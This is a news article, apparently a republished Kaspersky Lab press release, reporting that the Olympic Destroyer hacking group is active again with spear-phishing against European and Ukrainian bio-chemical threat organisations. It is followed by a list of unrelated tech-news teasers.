Kaspersky Lab researchers tracking the Olympic Destroyer threat that famously struck the opening of the Winter Olympic Games in Pyeongchang with a destructive network worm have discovered that the hacking group behind it is still active. It appears to be targeting Germany, France, Switzerland, the Netherlands, Ukraine and Russia, with a focus on organizations involved in protection against chemical and biological threats.

 

Olympic Destroyer is an advanced threat that hit organizers, suppliers and partners of the Winter Olympic Games 2018 in Pyeongchang, South Korea with a cybersabotage operation based on a destructive network worm. Many indicators pointed in different directions for the origins of the attack, causing some confusion in the info-security industry in February 2018.

 

A few rare and sophisticated signs discovered by Kaspersky Lab suggested that Lazarus group, a North Korea-linked threat actor, was behind the operation. However, in March, the company confirmed that the campaign featured an elaborate and convincing false flag operation, and Lazarus was unlikely to be the source. Researchers have now found the Olympic Destroyer operation is back in action, using some of its original infiltration and reconnaissance toolset, and focusing on targets in Europe.

 

The threat actor is spreading its malware through spear-phishing documents that closely resemble the weaponized documents used in preparation for the Winter Olympics operation. One such decoy document referred to the ‘Spiez Convergence’, a bio-chemical threats conference held in Switzerland and organized by the Spiez Laboratory, an organization that played a key role in the Salisbury attack investigation. Another document was targeting an entity of the health and veterinary control authority of Ukraine. Some of the spear-phishing documents uncovered by researchers carry words in Russian and German.

 

All final payloads extracted from the malicious documents were designed to provide generic access to the compromised computers. An open-source and free framework, widely known as Powershell Empire, was used for the second stage of the attack.

 

The attackers appear to use compromised legitimate webservers to host and control the malware. These servers use a popular open-source content management system (CMS) called Joomla. The researchers found that one of the servers hosting the malicious payload used a version of Joomla (v1.7.3) released in November 2011, which suggests that a very outdated variant of the CMS could have been used by the attackers to hack the servers.

 

Based on Kaspersky Lab telemetry and files uploaded to multi-scanner services, the interests of this Olympic Destroyer campaign appear to have been entities in Germany, France, Switzerland, the Netherlands, Ukraine and Russia.

 

The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever and showed how easy it is to make a mistake with only fragments of the picture that are visible to researchers. The analysis and deterrence of these threats should be based on cooperation between the private sector and governments across national borders. We hope that by sharing our findings publicly, incident responders and security researchers will be better placed to recognize and mitigate such an attack at any stage in the future.” said Vitaly Kamluk, security researcher in Kaspersky Lab’s GReAT team.

 

In the previous attack, during the Winter Olympic Games, the beginning of the reconnaissance stage was a couple of months before the epidemic of the self-modifying destructive network worm. It is highly possible that Olympic Destroyer is preparing a similar attack with new motives. That is why we advise biological and chemical threat research entities to stay on high alert and launch an out-of-schedule security audit where possible.

 

Kaspersky Lab products successfully detect and block Olympic Destroyer-related malware.

For further information on the return of Olympic Destroyer, including Indicators of Compromise, read the blog on Securelist.


RECOMMENDED ARTICLE FOR TECHWORLD


 
ASUS Invites Budding Tech Aspirants in the ROG Specialist Program
Techworld Date Posted: 16 August 2017 11:52 AM | 182 Views
The Republic of Gamers is currently looking for people to join the ROG Specialist Program. The progam aims to enrich the knowledge and capabilities of new tech enthusiasts in the field of computers and.... See More
 
ASUS Invites Budding Tech Aspirants in the ROG Specialist Program
Techworld Date Posted: 11:52 AM | 182 Views
The Republic of Gamers is currently looking for people to join the ROG Specialist Program. The progam aims to enrich the knowledge and capabilities of new tech enthusiasts in the field of computers and...See More

 
LG OLED TV WINS FOURTH CONSECUTIVE CE WEEK TV SHOOTOUT TITLE
Techworld Date Posted: 22 July 2017 2:39 PM | 376 Views
The highly acclaimed LG E7 OLED TV was crowned “2017 King of TV” in the 14thAnnual CE Week TV Shootout™ in a competition amongst six contending flagship 4K Ultra HD TV models during CE.... See More
 
LG OLED TV WINS FOURTH CONSECUTIVE CE WEEK TV SHOOTOUT TITLE
Techworld Date Posted: 2:39 PM | 376 Views
The highly acclaimed LG E7 OLED TV was crowned “2017 King of TV” in the 14thAnnual CE Week TV Shootout™ in a competition amongst six contending flagship 4K Ultra HD TV models during CE...See More

 
OPPO to Launch Power-Packed F9 in the Philippines
Techworld Date Posted: 9 August 2018 4:41 PM | 109 Views
OPPO announced its latest model F9, which is set to launch in the country on August 15. OPPO F9 is the brand-new breakthrough F series smartphone that will ship with VOOC Flash charge, gradient.... See More
 
OPPO to Launch Power-Packed F9 in the Philippines
Techworld Date Posted: 4:41 PM | 109 Views
OPPO announced its latest model F9, which is set to launch in the country on August 15. OPPO F9 is the brand-new breakthrough F series smartphone that will ship with VOOC Flash charge, gradient...See More

 
Meltdown and Spectre Chip Vulnerabilities Could Facilitate Memory Leaks
Techworld Date Posted: 11 January 2018 9:46 AM | 167 Views
Symantec has released the following detection for attempts to exploit the Multiple CPU Hardwares Information Disclosure Vulnerability (CVE-2017-5753/Spectre):. See More
 
Meltdown and Spectre Chip Vulnerabilities Could Facilitate Memory Leaks
Techworld Date Posted: 9:46 AM | 167 Views
Symantec has released the following detection for attempts to exploit the Multiple CPU Hardwares Information Disclosure Vulnerability (CVE-2017-5753/Spectre):See More

 
HMD Introduces Five New Nokia Phones
Techworld Date Posted: 27 February 2018 4:42 PM | 178 Views
HMD Global, the home of Nokia phones, announced four new additions to its award-winning portfolio of Android smartphones – Nokia 8 Sirocco, Nokia 7 Plus, new Nokia 6 and Nokia 1.. See More
 
HMD Introduces Five New Nokia Phones
Techworld Date Posted: 4:42 PM | 178 Views
HMD Global, the home of Nokia phones, announced four new additions to its award-winning portfolio of Android smartphones – Nokia 8 Sirocco, Nokia 7 Plus, new Nokia 6 and Nokia 1.See More

 
Transcend Releases Lightning-fast PCIe Solid-state Drive for Mac Computers
Techworld Date Posted: 29 August 2017 3:50 PM | 199 Views
Transcend Information Inc., a leading manufacturer of storage and multimedia products, is proud to announce the release of the JetDrive 820 PCI Express (PCIe) Gen 3.0 solid-state drive (SSD) for Mac computers. The JetDrive.... See More
 
Transcend Releases Lightning-fast PCIe Solid-state Drive for Mac Computers
Techworld Date Posted: 3:50 PM | 199 Views
Transcend Information Inc., a leading manufacturer of storage and multimedia products, is proud to announce the release of the JetDrive 820 PCI Express (PCIe) Gen 3.0 solid-state drive (SSD) for Mac computers. The JetDrive...See More

 
Bykski Announces Real-Time Temperature Monitoring Fittings for Watercooling
Techworld Date Posted: 28 April 2018 4:33 PM | 331 Views
Bykski, professional manufacturer of computer watercooling solutions, is proud to announce the availability of its real-time temperature sensor monitor featuring HD LCD displays capable showcasing real-time information to the users. The Bykski B-TME-SE-AL and.... See More
 
Bykski Announces Real-Time Temperature Monitoring Fittings for Watercooling
Techworld Date Posted: 4:33 PM | 331 Views
Bykski, professional manufacturer of computer watercooling solutions, is proud to announce the availability of its real-time temperature sensor monitor featuring HD LCD displays capable showcasing real-time information to the users. The Bykski B-TME-SE-AL and...See More

 
NVIDIA Has Five Never-Before Seen Screenshots of the Upcoming PUBG Desert Map
Techworld Date Posted: 17 November 2017 11:37 AM | 174 Views
Today NVIDIA revealed five exclusive screenshots for the upcoming desert map for the wildly popular PlayerUnknown’s Battlegrounds (PUBG).. See More
 
NVIDIA Has Five Never-Before Seen Screenshots of the Upcoming PUBG Desert Map
Techworld Date Posted: 11:37 AM | 174 Views
Today NVIDIA revealed five exclusive screenshots for the upcoming desert map for the wildly popular PlayerUnknown’s Battlegrounds (PUBG).See More

 
Nokia Mobile Introduces Edge-to-Edge Smartphone Experience
Techworld Date Posted: 16 October 2018 4:05 PM | 70 Views
HMD Global, the home of Nokia phones, has announced the availability of the Nokia 6.1 Plus and the Nokia 5.1 Plus in the Philippines.. See More
 
Nokia Mobile Introduces Edge-to-Edge Smartphone Experience
Techworld Date Posted: 4:05 PM | 70 Views
HMD Global, the home of Nokia phones, has announced the availability of the Nokia 6.1 Plus and the Nokia 5.1 Plus in the Philippines.See More

 
Win a Brand New Car in TCL Cool Deals Hot Wheels 2 Promo
Techworld Date Posted: 4 November 2017 4:15 PM | 308 Views
TCL, one of the leading TV and AV brands in the country, will give away One (1) brand new Toyota Wigo in its TCL Cool Deals Hot Wheels 2 raffle promo which will run.... See More
 
Win a Brand New Car in TCL Cool Deals Hot Wheels 2 Promo
Techworld Date Posted: 4:15 PM | 308 Views
TCL, one of the leading TV and AV brands in the country, will give away One (1) brand new Toyota Wigo in its TCL Cool Deals Hot Wheels 2 raffle promo which will run...See More


Power by

Download Free AZ | Free Wordpress Themes